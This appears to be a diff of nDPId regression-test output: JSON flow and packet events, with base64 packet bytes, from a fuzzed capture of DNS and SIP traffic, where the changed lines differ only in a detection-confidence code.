-00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469572842,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469572842,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01073{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1120469572844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469572844,"pkt":"ADBUADRWAODtAW69CABFAAHvaZgAAIARF6bAqAE01PIhIxPEE8QB2272UkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmkdOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEubDticmFuY2g9ejloRzRiS25wMTUxMjQ4NzM3LTQ2WmE3MTVlMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTkwM2RmMGENClRvOiA8c2lwOnZvaTE4MCVzAHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktbTY2NWQ3NzWjNTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9OWM3ZDJkYmQ4ODIyMDEzYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572981,"flow_last_seen":1120469572981,"flow_idle_time":200000,"flow_min_l4_payload_len":486,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120469572981,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01097{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1120469572981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1120469572981,"pkt":"AODtAW69ADBUADRWCABFAAICAABAADcRiivU8iEjwKgBAhPEE8QB7tD8U0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWhsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA2OCBSRUdJU1RFUg0KRnJvbTogPHNpcDp2b2kxODA2M0BzaXAuY3lRZXJjaXR5LmRrPjt0YWc9OTAzZGYwYQ0KVG86IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kay47dGFnPTAwLTA0MDkyLTE3MDFhZjYyLTEyMGM2NzE3Mg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4SjEuMjtyZWNlaXZlZD04MGcyMzAuMm05LjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5d0c0YktucDE1MTI0ODczNy00NmVhNzE1ZTE5Mi4xNjguMS4yDQpXV1ctQXV0aGVmdGljYXRlOiBE+2dlc3QgcmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLG5vbmNlLSIxNzCxYWY1NjZiZTE4MjA3MDA4tGM2Zhc0MDcwNmJiIixvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsc3RhbGU9ZmFscyVzAGxnb3JpdGhtPU1ENQ0KQ29udGVudC1MZW5ndGg6IDANCg0K"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572981,"flow_last_seen":1120469572981,"flow_idle_time":200000,"flow_min_l4_payload_len":486,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120469572981,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572981,"flow_last_seen":1120469572981,"flow_idle_time":200000,"flow_min_l4_payload_len":486,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120469572981,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1120469573246,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469573246,"pkt":"ADBUAGNWAODtAW69CABFAABIaZkAAIIRTbjAqAECwKgBAQqbADVANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAgAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":32,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":32,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1120469574242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469574242,"pkt":"ADBUADRWAODtAW69CABFAABIaZoAAIARTbfAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469573246,"flow_last_seen":1120469574242,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469574242,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469573246,"flow_last_seen":1120469574242,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469574242,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469576245} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469574242,"pkt":"ADCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1120469578248,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469578248,"pkt":"ADBUADRWAODtAW69CABFAABIaZwAAIARTbXAqAECwKgBAQqbADUANPFWONMBAAABAAAAAABJBF9zaXAEX3VkcANzaXAJY3liZXLyaXR5AmRrAAAhAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469578248,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyber?ity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469578248,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyber?ity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469582254} 00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469578248,"pkt":"ADBUADRWAODtAW69CABFAAB2aZ0AAIARTbTAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5TWRrAAAhAAE="} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1120469589080,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469589080,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaZ4AAIARTK\/AqAECwKgB\/wCJAIkAOluxhOoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1120469590256,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469590256,"pkt":"ADBUADRWAODtAW69CABFAABEaaAAAIARTbXAqAECwKgBAQqcADUAMHpPqtMAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469590257,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1120469590257,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":65,"thread_ts_msec":1120469590257,"pkt":"AODtAW69ADBUADRWCABFAABVAABAAEARtz7AqAEBwKgBAiVzAJwAx1zLqtOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240,"global_ts_msec":1120469590259} 01249{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":722,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":722,"pkt_l4_len":0,"thread_ts_msec":1120469590257,"pkt":"ADBUADRWAODtAW69KABFAALEaaEAAIARFsjAqAEC1PIhIxPEE8QCsIioUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhVyBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFsY2g9ejloRzRiS25wMTQ5NTA1MTc4LTQzOGM1MjhiMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPThlOTQ4YjANClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4PjEuMjo1MDYwO2xpbmU8OWM3ZDJkYmQ4ODIyMDHhYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDY5IFJFR0lTVEVSDQpDb250ZW50LUxlbmd0aDogMA0KQXV0aG9yaXphdGlvbjogRGlnZXMlcwBzZXJuYW1lPSJ2b2mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00858{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1120469590405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1120469590405,"pkt":"AODtAW69ADBUADRWCABFAAFOAABAADcRit\/Q8iEjwKgBAhPEE8QBOln2U0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDQ2VxOiA2OSBSRUdJU1RFUg0KRnJvbTogPHNpcEZ2b2kxODA2M0DzaXAuY3liZXJjaXR5LmRrPjt0YWc9OGU5NDhiMA0KVG86IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz4NClacYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7cmVjZWl2ZWQ9ODAuMjMwLjIxOS43MDtycG9ydD01MDYwO2JyYW5jaD16OWhHNGJLbnAxNDk1MDUxNzhTNDM4YzUyOGIxOTIuMTY4LjEuMg0KQ29udGVudC1MZW5ndGg6IDANCg0K"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 